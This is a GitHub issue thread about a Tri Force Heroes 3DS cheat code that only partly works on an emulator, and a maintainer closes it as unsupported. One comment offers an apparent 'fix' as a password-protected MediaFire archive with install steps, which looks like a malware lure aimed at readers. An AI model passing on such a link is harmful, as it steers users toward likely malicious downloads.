### ISSUE TITLE
Issue with the [All Drablands Challenges Done (Solo) (Version 2.1 n3DS)] code in The Legend of Zelda: Tri Force Heroes

### ISSUE THREAD

**Issue by spacenerd117** [FlagBrew/Sharkive#324] opened 2024-09-01 22:10 UTC
## Issue template

* [] The code doesn't complete all the challenges; the ones completed seem to be dependent on when the code is activated. I've had different ones marked when I've activated it in the title screen, the single player lobby without the Doppels activated, the single-player lobby with the Doppels activated, etc. I'm assuming that there is a location/state for the game where activating the code does complete all the challenges.

* **Platform (3DS/Switch)**: 3DS
* **Title ID**: 0004000000176F00
* **Product code**: 
* **Game version**: 2.1.0
* **Luma version**:
* **Atmosphere-NX version**:
*  Running on Lime3DS 2116

### Not working codes

* [All Drablands Challenges Done (Solo) (Version 2.1 n3DS)]
D3000000 31A060EC
C0000000 00000004
90000000 FFE1001E
DA000000 00000008
F6000000 FFFFFFE1
D4000000 0000001E
D7000000 00000008
DC000000 FFFFFFFE
D7000000 00000010
DC000000 FFFFFFFE
D7000000 00000018
DC000000 FFFFFFFE
D0000000 00000000
90000000 FE1F01E0
DA000000 00000008
F6000000 FFFFFE1F
D4000000 000001E0
D7000000 00000008
DC000000 FFFFFFFE
D7000000 00000010
DC000000 FFFFFFFE
D7000000 00000018
DC000000 FFFFFFFE
D0000000 00000000
DC000000 00000001
D1000000 00000000
D3000000 31A060EC
C0000000 00000003
D9000000 00000008
D6000000 00000088
DC000000 FFFFFFFC
D6000000 000000C8
DC000000 FFFFFFFC
D9000000 0000000C
D6000000 0000008C
DC000000 FFFFFFFC
D6000000 000000CC
DC000000 00000004
D1000000 00000000
D3000000 31A06354
C0000000 00000008
50000000 00000001
50000010 00000001
50000020 00000001
50000030 00000001
00000004 00000001
00000014 00000001
00000024 00000001
00000034 00000001
00000008 00000001
00000018 00000001
00000028 00000001
00000038 00000001
0000000C 00000001
0000001C 00000001
0000002C 00000001
0000003C 00000001
D0000000 00000000
D0000000 00000000
D0000000 00000000
D0000000 00000000
DC000000 00000040
D1000000 00000000
C0000000 00000080
60000000 00000000
D4000000 00000001
D0000000 00000000
DC000000 00000004
D1000000 00000000
D3000000 31A06350
D6000000 00000000

**Comment by JourneyOver** [comment] 2024-09-01 23:33
As you are not running these cheats on the original hardware via Luma/Atmosphere and instead running on `A Nintendo 3DS emulator based on Citra` this is going to be closed as it can't be confirmed as not working as intended. If you can replicate this issue on official hardware (with proof), please let us know and we can re-open this issue.

**Comment by goncastrum** [comment] 2024-09-01 23:34
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Closed by JourneyOver** 2024-09-01 23:33 UTC
